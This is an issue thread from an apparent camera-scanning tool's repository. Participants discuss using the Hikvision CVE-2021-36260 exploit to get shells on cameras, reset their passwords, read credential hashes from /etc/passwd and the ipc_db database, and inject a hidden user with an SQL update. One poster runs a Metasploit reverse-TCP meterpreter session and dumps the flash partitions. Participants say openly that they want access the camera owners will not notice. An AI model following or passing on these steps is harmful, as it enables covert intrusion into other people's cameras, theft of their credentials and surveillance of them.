I can't view the HIKVISION cam via cve_2021_36260

[Doublefire-Chen]

As described in title, how can solve it?

[jorhelp]

I know a not so good way:

Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.

The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

[jorhelp]

If anyone knows how to deal this, I hope they can give us some advice and maybe even integrate batch code into the project. Our team can't thank you enough.

[Doublefire-Chen]

I know a not so good way:

Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.

The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

But if I do this, the owner of the cam will understand what happened as he can't log in his web one day(doge). It will be awesome if there is an anonymous way to do it.

[Doublefire-Chen]

If we can read the username and password via shell, or disable the web authorization, it will be a great job.

[jorhelp]

I know a not so good way:
Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.
The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

But if I do this, the owner of the cam will understand what happened as he can't log in his web one day(doge). It will be awesome if there is an anonymous way to do it.

If we can read the username and password via shell, or disable the web authorization, it will be a great job.

/etc/passwd records the password, but it takes too long to crack. If a 'configureFile' is available (as in CVE-2017-7921), the user name and password can be resolved.

[Doublefire-Chen]

I know the author who report this bug can "Disable web authentication and login to target camera admin web pages with any password", but there is no more detail about how to reproduction it.
Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

[Doublefire-Chen]

I know a not so good way:
Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.
The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

But if I do this, the owner of the cam will understand what happened as he can't log in his web one day(doge). It will be awesome if there is an anonymous way to do it.

If we can read the username and password via shell, or disable the web authorization, it will be a great job.

/etc/passwd records the password, but it takes too long to crack. If a 'configureFile' is available (as in CVE-2017-7921), the user name and password can be resolved.

I am not sure whether the /etc/passwd is the same pwd with the web auth. If it is, maybe we can create a new account or just use the encrypted pwd to login?(maybe the encryption method is different so that it is not useful)
BTW, I know use showKey to get the Hikvision device verification code, but I don't know whether it is useful to achieve our goal.

[jorhelp]

I know the author who report this bug can "Disable web authentication and login to target camera admin web pages with any password", but there is no more detail about how to reproduction it. Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

Nice work. I will try to consult the author by email

[Doublefire-Chen]

I know the author who report this bug can "Disable web authentication and login to target camera admin web pages with any password", but there is no more detail about how to reproduction it. Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

Nice work. I will try to consult the author by email

Waiting for your good news.

[Aha1976]

I know a not so good way:

Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.

The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

The --shell command does not work. ssh error. Help solve the problem.

[jorhelp]

I know a not so good way:
Firstly, login in the device by:

python3 scan/lib/CVE-2021-36260.py --rhost YOUR_IP --shell

After you login in, execute the following command：

resetParam

After a few seconds, the password will reset, and you will be asked to set your password when logging in through your browser.
The disadvantages of this approach are: it cannot be batched; There is no 'resetParam' command on some versions of the device

The --shell command does not work. ssh error. Help solve the problem.

I'm sorry, I'm not sure if it's the device or the code. Since CVE-2021-36260.py is directly from here, we haven't changed it.

[avikowy]

there is sqlite db which is accessible from shell at /devinfo/ipc_db use metasploit with reverse tcp handler if target is behind nat on remote network example here: https://www.youtube.com/watch?v=3NzdQxqZJqc
download ipc_db then on local pc using sqlite3:

$ sqlite3 ipc_db.ori
SQLite version 3.38.3 2022-04-27 12:03:15
Enter ".help" for usage hints.
sqlite> .mode line
sqlite> select * from sec_user_mana_info where idx=2;
               idx = 2
          username =
            passwd =
         ipv4_addr = 0
         ipv6_addr =
          mac_addr =
        permission = 0
          priority = 0
        user_level = 0
          user_num = 0
 preview_permision = 0
playback_permision = 0
  record_permision = 0
 ptzctrl_permision = 0
sqlite> select * from sec_user_mana_info where idx=1;
               idx = 1
          username = :8e:da:26:2d:46:7a:ab:13:aa:5c:f7:a4:30:31:6a:ec
            passwd = :eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b
         ipv4_addr = 0
         ipv6_addr = 0:0:0:0:
          mac_addr = 000000000000000000
        permission = -1
          priority = 2
        user_level = 2
          user_num = 1
 preview_permision = 4294967295
playback_permision = 4294967295
  record_permision = 4294967295
 ptzctrl_permision = 4294967295
sqlite>

idx=2 is empty idx=1 user=admin passwd=admin12345

after adding from www new user type operator and all possible rights user=default passwd=admin12345

$ sqlite3 ipc_db
SQLite version 3.38.3 2022-04-27 12:03:15
Enter ".help" for usage hints.
sqlite> .mode line
sqlite> select * from sec_user_mana_info where idx=1;
               idx = 1
          username = :8e:da:26:2d:46:7a:ab:13:aa:5c:f7:a4:30:31:6a:ec
            passwd = :eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b
         ipv4_addr = 0
         ipv6_addr = 0:0:0:0:
          mac_addr = 000000000000000000
        permission = -1
          priority = 2
        user_level = 2
          user_num = 2
 preview_permision = 4294967295
playback_permision = 4294967295
  record_permision = 4294967295
 ptzctrl_permision = 4294967295
sqlite> select * from sec_user_mana_info where idx=2;
               idx = 2
          username = :9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a
            passwd = :eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b
         ipv4_addr = 0
         ipv6_addr = 0:0:0:0:
          mac_addr = 000000000000000000
        permission = 39575552
          priority = 0
        user_level = 1
          user_num = 0
 preview_permision = 1
playback_permision = 1
  record_permision = 1
 ptzctrl_permision = 0

im not db guru but maybe adding same into another db where admin is not known will work, need to test eg:

sqlite3 ipc_db "update sec_user_mana_info set username=':9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a',passwd=':eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b',ipv4_addr=0,ipv6_addr='0:0:0:0:',mac_addr='000000000000000000',permission=39575552,priority=0,user_level=1,user_num=0,preview_permision=1,playback_permision=1,record_permision=1,ptzctrl_permision=0 where idx=2;"

quick test:

$ sqlite3 ipc_db.ori "select * from sec_user_mana_info;" -csv
1,:8e:da:26:2d:46:7a:ab:13:aa:5c:f7:a4:30:31:6a:ec,:eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b,0,0:0:0:0:,000000000000000000,-1,2,2,1,4294967295,4294967295,4294967295,4294967295
2,"","",0,"","",0,0,0,0,0,0,0,0
3,"","",0,"","",0,0,0,0,0,0,0,0
4,"","",0,"","",0,0,0,0,0,0,0,0
5,"","",0,"","",0,0,0,0,0,0,0,0
6,"","",0,"","",0,0,0,0,0,0,0,0
7,"","",0,"","",0,0,0,0,0,0,0,0
8,"","",0,"","",0,0,0,0,0,0,0,0
9,"","",0,"","",0,0,0,0,0,0,0,0
10,"","",0,"","",0,0,0,0,0,0,0,0
11,"","",0,"","",0,0,0,0,0,0,0,0
12,"","",0,"","",0,0,0,0,0,0,0,0
13,"","",0,"","",0,0,0,0,0,0,0,0
14,"","",0,"","",0,0,0,0,0,0,0,0
15,"","",0,"","",0,0,0,0,0,0,0,0
16,"","",0,"","",0,0,0,0,0,0,0,0
17,"","",0,"","",0,0,0,0,0,0,0,0
18,"","",0,"","",0,0,0,0,0,0,0,0
19,"","",0,"","",0,0,0,0,0,0,0,0
20,"","",0,"","",0,0,0,0,0,0,0,0
21,"","",0,"","",0,0,0,0,0,0,0,0
22,"","",0,"","",0,0,0,0,0,0,0,0
23,"","",0,"","",0,0,0,0,0,0,0,0
24,"","",0,"","",0,0,0,0,0,0,0,0
25,"","",0,"","",0,0,0,0,0,0,0,0
26,"","",0,"","",0,0,0,0,0,0,0,0
27,"","",0,"","",0,0,0,0,0,0,0,0
28,"","",0,"","",0,0,0,0,0,0,0,0
29,"","",0,"","",0,0,0,0,0,0,0,0
30,"","",0,"","",0,0,0,0,0,0,0,0
31,"","",0,"","",0,0,0,0,0,0,0,0
32,"","",0,"","",0,0,0,0,0,0,0,0

$ sqlite3 ipc_db_addeduser "select * from sec_user_mana_info;" -csv
1,:8e:da:26:2d:46:7a:ab:13:aa:5c:f7:a4:30:31:6a:ec,:eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b,0,0:0:0:0:,000000000000000000,-1,2,2,2,4294967295,4294967295,4294967295,4294967295
2,:9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a,:eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b,0,0:0:0:0:,000000000000000000,39575552,0,1,0,1,1,1,0
3,"","",0,"","",0,0,0,0,0,0,0,0
(....)
32,"","",0,"","",0,0,0,0,0,0,0,0

trying add from cmdline:

$ sqlite3 ipc_db "update sec_user_mana_info set username=':9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a',passwd=':eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b',ipv4_addr=0,ipv6_addr='0:0:0:0:',mac_addr='000000000000000000',permission=39575552,priority=0,user_level=1,user_num=0,preview_permision=1,playback_permision=1,record_permision=1,ptzctrl_permision=0 where idx=2;"


$ sqlite3 ipc_db "select * from sec_user_mana_info;" -csv                                                                                                     1,:8e:da:26:2d:46:7a:ab:13:aa:5c:f7:a4:30:31:6a:ec,:eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b,0,0:0:0:0:,000000000000000000,-1,2,2,1,4294967295,4294967295,4294967295,4294967295
2,:9e:57:c9:c9:d5:2b:5f:b6:d3:c4:71:bf:be:16:89:5a,:eb:38:9b:a5:db:60:fc:35:37:48:df:86:85:16:6a:9b,0,0:0:0:0:,000000000000000000,39575552,0,1,0,1,1,1,0
3,"","",0,"","",0,0,0,0,0,0,0,0
(....)
32,"","",0,"","",0,0,0,0,0,0,0,0

perhaps there are simpler methods without adding new user but simply decode admin password saved in db

[avikowy]

it seems afterr updating idx=2 as side effect idx=1 disappears maybe someone better will fix it

[Doublefire-Chen]

it seems afterr updating idx=2 as side effect idx=1 disappears maybe someone better will fix it

Maybe we can read its source code to get its encrypt method so that we can decode it easier.

[avikowy]

meterpreter > shell
Process 6519 created.
Channel 1 created.
mount
rootfs on / type rootfs (rw)
proc on /proc type proc (rw,relatime)
none on /sys type sysfs (rw,relatime)
ramfs on /home type ramfs (rw,relatime)
udev on /dev type tmpfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
/dev/mtdblock5 on /dav type cramfs (ro,relatime)
/dev/mtdblock6 on /devinfo type jffs2 (rw,relatime)
none on /proc/bus/usb type usbfs (rw,relatime)
dmesg
[    0.000000] Linux version 3.0.8 (donggaopeng@Cpl-Frt-BSP) #1 Wed Dec 7 20:17:35 CST 2016
[    0.000000] CPU: ARM926EJ-S [41069265] revision 5 (ARMv5TEJ), cr=00053177
[    0.000000] CPU: VIVT data cache, VIVT instruction cache
[    0.000000] Machine: r2
[    0.000000] Memory policy: ECC disabled, Data cache writeback
[    0.000000] AXI bus clock 200000000.
[    0.000000] On node 0 totalpages: 28672
[    0.000000] free_area_init_node: node 0, pgdat c064d624, node_mem_map c066c000
[    0.000000]   Normal zone: 224 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 28448 pages, LIFO batch:7
[    0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
[    0.000000] pcpu-alloc: [0] 0
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 28448
[    0.000000] Kernel command line: console=ttyAMA0,115200 mtdparts=hi_sfc:256k(bld)ro,64k(env),64k(enc)ro,64k(usr),3584k(sys),10688k(app),1664k(cfg) mem=128M ip=192.0.0.64:::255.255.255.0 eth=54:c4:15:87:75:08 rst=0
[    0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[    0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[    0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[    0.000000] Memory: 112MB = 112MB total
[    0.000000] Memory: 107080k/107080k available, 7608k reserved, 0K highmem
[    0.000000] Virtual kernel memory layout:
[    0.000000]     vector  : 0xffff0000 - 0xffff1000   (   4 kB)
[    0.000000]     fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
[    0.000000]     DMA     : 0xffc00000 - 0xffe00000   (   2 MB)
[    0.000000]     vmalloc : 0xc7800000 - 0xfe000000   ( 872 MB)
[    0.000000]     lowmem  : 0xc0000000 - 0xc7000000   ( 112 MB)
[    0.000000]     modules : 0xbf000000 - 0xc0000000   (  16 MB)
[    0.000000]       .init : 0xc0008000 - 0xc01ca000   (1800 kB)
[    0.000000]       .text : 0xc01ca000 - 0xc062b000   (4484 kB)
[    0.000000]       .data : 0xc062c000 - 0xc064dca0   ( 136 kB)
[    0.000000]        .bss : 0xc064dcc4 - 0xc066b760   ( 119 kB)
[    0.000000] SLUB: Genslabs=13, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[    0.000000] NR_IRQS:32 nr_irqs:32 32
[    0.000000] sched_clock: 32 bits at 100MHz, resolution 10ns, wraps every 42949ms
[    0.000000] Console: colour dummy device 80x30
[    0.000675] Calibrating delay loop... 218.72 BogoMIPS (lpj=1093632)
[    0.070081] pid_max: default: 32768 minimum: 301
[    1.531883] Card authentication succeeded
[    1.532183] Mount-cache hash table entries: 512
[    1.533457] CPU: Testing write buffer coherency: ok
[    1.537072] NET: Registered protocol family 16
[    1.538191] Serial: AMBA PL011 UART driver
[    1.538515] uart:0: ttyAMA0 at MMIO 0x20080000 (irq = 5) is a PL011 rev2
[    1.538704] console [ttyAMA0] enabled
[    1.549052] bio: create slab <bio-0> at 0
[    1.551083] usbcore: registered new interface driver usbfs
[    1.551498] usbcore: registered new interface driver hub
[    1.551978] usbcore: registered new device driver usb
[    1.554739] cfg80211: Calling CRDA to update world regulatory domain
[    1.556635] Switching to clocksource timer1
[    1.574031] NET: Registered protocol family 2
[    1.574357] IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
[    1.575212] TCP established hash table entries: 4096 (order: 3, 32768 bytes)
[    1.576002] TCP bind hash table entries: 4096 (order: 2, 16384 bytes)
[    1.576401] TCP: Hash tables configured (established 4096 bind 4096)
[    1.576431] TCP reno registered
[    1.576467] UDP hash table entries: 256 (order: 0, 4096 bytes)
[    1.576609] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[    1.577428] NET: Registered protocol family 1
[    1.578217] RPC: Registered named UNIX socket transport module.
[    1.578264] RPC: Registered udp transport module.
[    1.578290] RPC: Registered tcp transport module.
[    1.578315] RPC: Registered tcp NFSv4.1 backchannel transport module.
[    2.126335] mmc0 power register success!
[    2.161068] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[    2.163557] JFFS2 version 2.2. © 2001-2006 Red Hat, Inc.
[    2.166338] msgmni has been set to 209
[    2.172054] io scheduler noop registered
[    2.172479] io scheduler cfq registered (default)
[    2.180496] brd: module loaded
[    2.181355] SPI id table Version 1.22
[    2.181395] Hisilicon Spi Flash Controller V350 Device Driver, Version 1.10
[    2.182008] SPI (cs1) ID: 0xC8 0x40 0x18 0xC8 0x40 0x18
[    2.183745] SPI FLASH start_up_mode is 3 Bytes
[    2.183800] GD25Q128, block size: 64KB, chip size: 16MB
[    2.183895] 7 cmdlinepart partitions found on MTD device hi_sfc
[    2.183928] Creating 7 MTD partitions on "hi_sfc":
[    2.183973] 0x000000000000-0x000000040000 : "bld"
[    2.186181] 0x000000040000-0x000000050000 : "env"
[    2.188316] 0x000000050000-0x000000060000 : "enc"
[    2.190628] 0x000000060000-0x000000070000 : "usr"
[    2.192866] 0x000000070000-0x0000003f0000 : "sys"
[    2.195085] 0x0000003f0000-0x000000e60000 : "app"
[    2.197391] 0x000000e60000-0x000001000000 : "cfg"
[    2.200242] Fixed MDIO Bus: probed
[    2.327728] r2_mii: probed
[    2.440602] PHY r2_mii:03 found : id is : 0x1cc816
[    2.446091] rtl8201f_set_EEE: set eee capability successfully
[    2.446408] PPP generic driver version 2.4.2
[    2.446966] PPP Deflate Compression module registered
[    2.447008] PPP BSD Compression module registered
[    2.470002] PPP MPPE Compression module registered
[    2.470138] NET: Registered protocol family 24
[    2.470515] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    2.470987] usb-ehci usb-ehci.0: HIUSB EHCI
[    2.471333] usb-ehci usb-ehci.0: new USB bus registered, assigned bus number 1
[    2.471729] usb-ehci usb-ehci.0: irq 15, io mem 0x100b0000
[    2.490164] usb-ehci usb-ehci.0: USB 0.0 started, EHCI 1.00
[    2.491671] hub 1-0:1.0: USB hub found
[    2.491769] hub 1-0:1.0: 1 port detected
[    2.492697] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[    2.493154] usb-ohci usb-ohci.0: HIUSB OHCI
[    2.493335] usb-ohci usb-ohci.0: new USB bus registered, assigned bus number 2
[    2.493503] usb-ohci usb-ohci.0: irq 16, io mem 0x100a0000
[    2.555558] hub 2-0:1.0: USB hub found
[    2.555656] hub 2-0:1.0: 1 port detected
[    2.556876] usbcore: registered new interface driver cdc_acm
[    2.556919] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters
[    2.557154] usbcore: registered new interface driver cdc_wdm
[    2.558095] rtc rtc: rtc core: registered rtc as rtc0
[    2.558682] r2 watchdog driver v1.0. initial timeout 60 sec
[    2.561240] Netfilter messages via NETLINK v0.30.
[    2.561450] nf_conntrack version 0.5.0 (1673 buckets, 6692 max)
[    2.563820] ip_tables: (C) 2000-2006 Netfilter Core Team
[    2.564077] TCP cubic registered
[    2.564112] Initializing XFRM netlink socket
[    2.567341] NET: Registered protocol family 10
[    2.571424] ip6_tables: (C) 2000-2006 Netfilter Core Team
[    2.571612] IPv6 over IPv4 tunneling driver
[    2.574699] NET: Registered protocol family 17
[    2.574854] NET: Registered protocol family 15
[    2.576668] sctp: Hash tables configured (established 4096 bind 8192)
[    2.578431] sctp: sctp_init_sock(sk: c6330000)
[    2.578587] lib80211: common routines for IEEE802.11 drivers
[    2.578628] lib80211_crypt: registered algorithm 'NULL'
[    2.578658] Registering the dns_resolver key type
[    2.578773] VFP support v0.3: not present
[    2.579760] registered taskstats version 1
[    2.580145] card disconnected!
[    2.580296] rtc rtc: setting system clock to 2022-06-17 21:43:02 UTC (1655502182)
[    3.092523] ADDRCONF(NETDEV_UP): eth0: link is not ready
[    4.100656] IP-Config: Complete:
[    4.100699]      device=eth0, addr=192.0.0.64, mask=255.255.255.0, gw=255.255.255.255,
[    4.100760]      host=192.0.0.64, domain=, nis-domain=(none),
[    4.100787]      bootserver=255.255.255.255, rootserver=255.255.255.255, rootpath=
[    4.102229] Freeing init memory: 1800K
[    5.441348] PHY: r2_mii:03 - Link is Up - 10/Full
[    5.441591] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[   11.401789] base module init.
[   11.423311] sspi: module license 'Proprietary' taints kernel.
[   11.423358] Disabling lock debugging due to kernel taint
[   11.451857] [motor_init]: insmod motor module successfully
[   11.514899] ipc_stm8: Unknown symbol HI_I2C_Read (err 0)
[   11.514971] ipc_stm8: Unknown symbol HI_I2C_Write (err 0)
[   11.534783] watch module init.
[   16.160131] eth0: no IPv6 routers present
[   37.495553] Hisilicon Media Memory Zone Manager
[   37.534753] Hisilicon UMAP device driver interface: v3.00
[   37.595168] pa:87000000, va:c7a00000
[   37.595205] load sys.ko ...OK!
[   37.777449] load viu.ko ...OK!
[   37.813020] ISP Mod init!
[   37.877514] load vpss.ko ....OK!
[   37.968439] load vou.ko ....OK!
[   38.012205] load venc.ko ...OK!
[   38.052600] load group.ko ...OK!
[   38.097869] load chnl.ko ...OK!
[   38.141516] load h264e.ko ...OK!
[   38.171089] load jpege.ko ...OK!
[   38.213783] load rc.ko ...OK!
[   38.243550] load region.ko ....OK!
[   38.286268] load vda.ko ....OK!
[   38.366317] hi_i2c init is ok!
[   38.370735] <is_i2c_lowspeed_device>dev_typ-22090
[   38.370772] I2C_400K!
[   38.415613] ssp_frameform: framemode=0,spo=1, sph=1, datawidth=12
[   38.415656] ssp initial ok!
[   38.451947] IPC
[   38.451991]     name:uart2,
[   38.452328] adding uart2, minor = 0
[   38.452746] Successfully insmod uart232 module!
[   38.561099] Kernel: ssp initial ok!
[   38.620810] acodec inited!
[   39.174700] Load hi_cipher.ko success.

from msfwconsole started shell
copied mtdblock* into separate files using cat mtdblock0 > 0 etc
downloaded all 6 files
then ill try to take a look over

ps w
  PID USER       VSZ STAT COMMAND
    1 admin     1376 S    init
    2 admin        0 SW   [kthreadd]
    3 admin        0 SW   [ksoftirqd/0]
    4 admin        0 SW   [kworker/0:0]
    6 admin        0 RW   [rcu_kthread]
    7 admin        0 SW<  [khelper]
    8 admin        0 SW   [sync_supers]
    9 admin        0 SW   [bdi-default]
   10 admin        0 SW<  [kblockd]
   11 admin        0 SW   [khubd]
   12 admin        0 SW<  [cfg80211]
   13 admin        0 SW   [kworker/0:1]
   14 admin        0 SW<  [rpciod]
   15 admin        0 SW   [kswapd0]
   16 admin        0 SWN  [ksmd]
   17 admin        0 SW   [fsnotify_mark]
   18 admin        0 SW<  [nfsiod]
   19 admin        0 SW<  [crypto]
   32 admin        0 SW   [mtdblock0]
   33 admin        0 SW   [mtdblock1]
   34 admin        0 SW   [mtdblock2]
   35 admin        0 SW   [mtdblock3]
   36 admin        0 SW   [mtdblock4]
   37 admin        0 SW   [mtdblock5]
   38 admin        0 SW   [mtdblock6]
   39 admin        0 SW   [kworker/u:1]
   61 admin      928 S <  /sbin/udevd -d
  152 admin     1248 S    /sbin/dropbear -R -I 1800
  159 admin      824 S    /bin/network_deamon -d 0x0e -r 0x00 -t 60
  217 admin        0 SWN  [jffs2_gcd_mtd6]
  299 admin        0 DW   [mark_mergeable]
  300 admin     1040 S    /bin/execSystemCmd
  302 admin     7236 S    /home/process/daemon_fsp_app
  306 admin    14412 S    /home/process/database_process
  307 admin    15224 S    /home/process/net_process
  324 admin     1520 S    -/bin/psh
  326 admin     270m S <  /home/davinci
  909 admin      484 S    /tmp/d
  910 admin      552 S    /tmp/d
 6499 admin     1064 S    /tmp/F
 6503 admin     1064 S    /tmp/F
 6508 admin     1408 S    /tmp/F
 6572 admin     1376 S    /bin/sh
 6590 admin     1376 R    ps w
16513 admin        0 SW   [kworker/u:2]

it seems after starting shell its somehow outside of the box, behavior is dirrefent than from msfwconsole itself

cd /home
ls -la
drwxr-xr-x    8 admin    root             0 Jun 20 14:10 .
drwxrwxrwx   18 admin    root             0 Dec  7  2016 ..
drwxrwxrwx    2 admin    root             0 Jun 17 21:43 applib
-rwxrwxr-x    1 1000     1000          6654 Jan 11  2017 base.ko
-rwxrwxrwx    1 admin    root          6250 Jun 17 21:43 initrun.sh
-rwxrwxrwx    1 admin    root          1164 Jun 20 14:10 ms
----------    1 admin    root             0 Jun 17 21:43 pidfile
drwxrwxrwx    2 admin    root             0 Jun 17 21:43 process
drwxrwxrwx    5 admin    root             0 Jun 17 21:43 r2_isp_config
-rwxrwxr-x    1 1000     1000          9987 Jan 11  2017 smart_config.ko
drwxrwxrwx    2 1056     1056             0 Jun 17 21:43 sound
drwxr-xr-x    2 admin    root             0 Jun 17 21:43 upnp_root
-rwxrwxrwx    1 admin    root             0 Jun 20 14:10 usb_bus
-rwxrwxr-x    1 1000     1000          3696 Jan 11  2017 watch.ko
drwxrwxrwx    4 admin    root             0 Jun 23 12:29 webLib
cat /etc/passwd
admin:$1$yi$N.HT4VImGIkkF1JTv6wO./:0:0:root:/:/bin/psh
cat initrun.sh
#!/bin/sh

ifconfig lo 127.0.0.1 netmask 255.255.255.0 &
ifconfig eth0 192.0.0.64 netmask 255.255.255.0 &

#▒ϲ▒Ӧ▒▒▒▒▒֮ǰ▒▒ɾ▒▒Ĭ▒▒▒▒▒
route del default

mount -t cramfs /dev/mtdblock5 /dav
mkdir /home/process
mkdir /home/webLib
cd /dav/
cp -rf execSystemCmd da_info  ss /bin

cp -rf net_process.lzma daemon_fsp_app database_process.lzma hostapd.lzma /home/process

cp -rf  t1.lzma /home
mkdir /home/applib
cp /dav/libsqlite3.so.lzma /home/applib
#cp /dav/libcrypto.so.lzma /home/applib
cp /dav/libiconv_utf8Gbk.so.lzma  /home/applib
cp /dav/libhikosip.so.lzma /home/applib
cp /dav/libfsp_base.so.lzma /home/applib
cp /dav/libosip2.so.lzma /home/applib
cp /dav/libosipparser2.so.lzma /home/applib
#cp /dav/libcrypto.so.lzma /home/applib
#cp /dav/libremote_dbg.so.lzma /home/applib
#cp /dav/libsave_alarminfo.so.lzma /home/applib
#cp /dav/libpassenger_info.so.lzma /home/applib

chmod 777 /dav/libcrypto.so
ln -s /dav/libcrypto.so /lib/libcrypto.so.1.0.0

cd /home/applib
lzma -df libsqlite3.so.lzma
lzma -df libiconv_utf8Gbk.so.lzma
lzma -df libhikosip.so.lzma
#lzma -df libcrypto.so.lzma
lzma -df libfsp_base.so.lzma
lzma -df libosip2.so.lzma
lzma -df libosipparser2.so.lzma
#lzma -df libremote_dbg.so.lzma
#lzma -df libsave_alarminfo.so.lzma
#lzma -df libpassenger_info.so.lzma

chmod 777 /home/applib/libsqlite3.so
ln -s /home/applib/libsqlite3.so /lib/libsqlite3.so

#chmod 777 /home/applib/libcrypto.so
#ln -s /home/applib/libcrypto.so /lib/libcrypto.so.1.0.0

cp /dav/libipc_unix.so /home/applib
chmod 777 /home/applib/libipc_unix.so
ln -s /home/applib/libipc_unix.so /lib/libipc_unix.so

#cp /dav/libfsp_base.so /home/applib
chmod 777 /home/applib/libfsp_base.so
ln -s /home/applib/libfsp_base.so /lib/libfsp_base.so

chmod 777 /home/applib/libosip2.so
ln -s /home/applib/libosip2.so /lib/libosip2.so

chmod 777 /home/applib/libosipparser2.so
ln -s /home/applib/libosipparser2.so /lib/libosipparser2.so

chmod 777 /home/applib/libhikosip.so
ln -s /home/applib/libhikosip.so /lib/libhikosip.so

cp /home/applib/libiconv_utf8Gbk.so /home/applib/libiconv.so.2
chmod 777 /home/applib/libiconv.so.2
ln -s /home/applib/libiconv.so.2 /lib/libiconv.so.2
rm /home/applib/libiconv_utf8Gbk.so


#▒▒▒˽▒▒▒

cd /home

#lzma -df diald.lzma
lzma -df t1.lzma

chmod 777 /home/t1
mv /home/t1 /bin/

cd /home/process
lzma -df net_process.lzma
lzma -df hostapd.lzma
lzma -df database_process.lzma

cd -
tar zxf /dav/sound.tar.gz -C /home
tar zxf /dav/r2_isp_config.tar.gz -C /home
#tar zxf /dav/help.tar.gz -C /home/webLib
cp /dav/SoftwareLicense.txt /home/webLib

#▒▒ѹȫ▒▒▒▒▒▒Դ
#tar zxf dvrCmd.tar.gz -C /bin
mkdir /var/run
mkdir /var/run/wpa_supplicant
mkdir /var/run/hostapd

mount -t jffs2 /dev/mtdblock6 /devinfo
if [ "$?" != "0" ] ; then
        echo "Failed to mount cfg partition, format and remount!"
        umount /devinfo
        cp -rf /dav/flash_eraseall /home
        chmod +x /home/flash_eraseall
        /home/flash_eraseall /dev/mtd6
        mount -t jffs2 /dev/mtdblock6 /devinfo
fi

#wifi▒▒4G USB ID▒▒▒ɴ▒"/proc/bus/usb/devices"▒▒ȡ
mount -t usbfs none /proc/bus/usb



#▒▒ѹhisiָ▒▒
/bin/tar xzf /dav/r2_cmd.tgz -C /bin/

cd /bin


chmod +x /bin/da_info

ln -s /bin/da_info getRtcpStatus
ln -s /bin/da_info setRtcpStatus
ln -s /bin/da_info setFtpService
ln -s /bin/da_info sdDataCheck
ln -s /bin/da_info getNetConnInfo
ln -s /bin/da_info getModuleVer
ln -s /bin/da_info aflibDebug

#ISP ▒▒▒▒▒▒▒▒---by liyong
ln -s /bin/da_info getisp
ln -s /bin/da_info setisp
ln -s /bin/da_info r_reg
ln -s /bin/da_info w_reg
#▒▒▒▒▒▒▒▒▒▒▒---by liyong
ln -s /bin/da_info setD2N
ln -s /bin/da_info setN2D
ln -s /bin/da_info gdbcfg
ln -s /bin/da_info upgcfg

#MCU▒▒▒▒▒▒▒▒
ln -s /bin/da_info mcu_learn
ln -s /bin/da_info mcu_debug

#QP
ln -s /bin/da_info setQP
ln -s /bin/da_info getQP

#▒▒▒▒ ▒▒▒▒▒
ln -s /bin/da_info setFanMode
ln -s /bin/da_info setTempCtrlMode

#▒▒▒▒ʱ
ln -s /bin/da_info setLowDelayMode
ln -s /bin/da_info getLowDelayMode

#▒▒Ƶ7▒▒▒▒▒▒▒
ln -s /bin/da_info showKey
ln -s /bin/da_info showServer
ln -s /bin/da_info showUpnp
ln -s /bin/da_info showStatus
ln -s /bin/da_info showDefence
ln -s /bin/da_info setLBS
ln -s /bin/da_info setAlarm
ln -s /bin/da_info setUpgradeTime
ln -s /bin/da_info cloudService
ln -s /bin/da_info setWlan
ln -s /bin/da_info setSerial485Status
ln -s /bin/da_info getPreviewStatus
ln -s /bin/da_info getPreviewStatus_inner
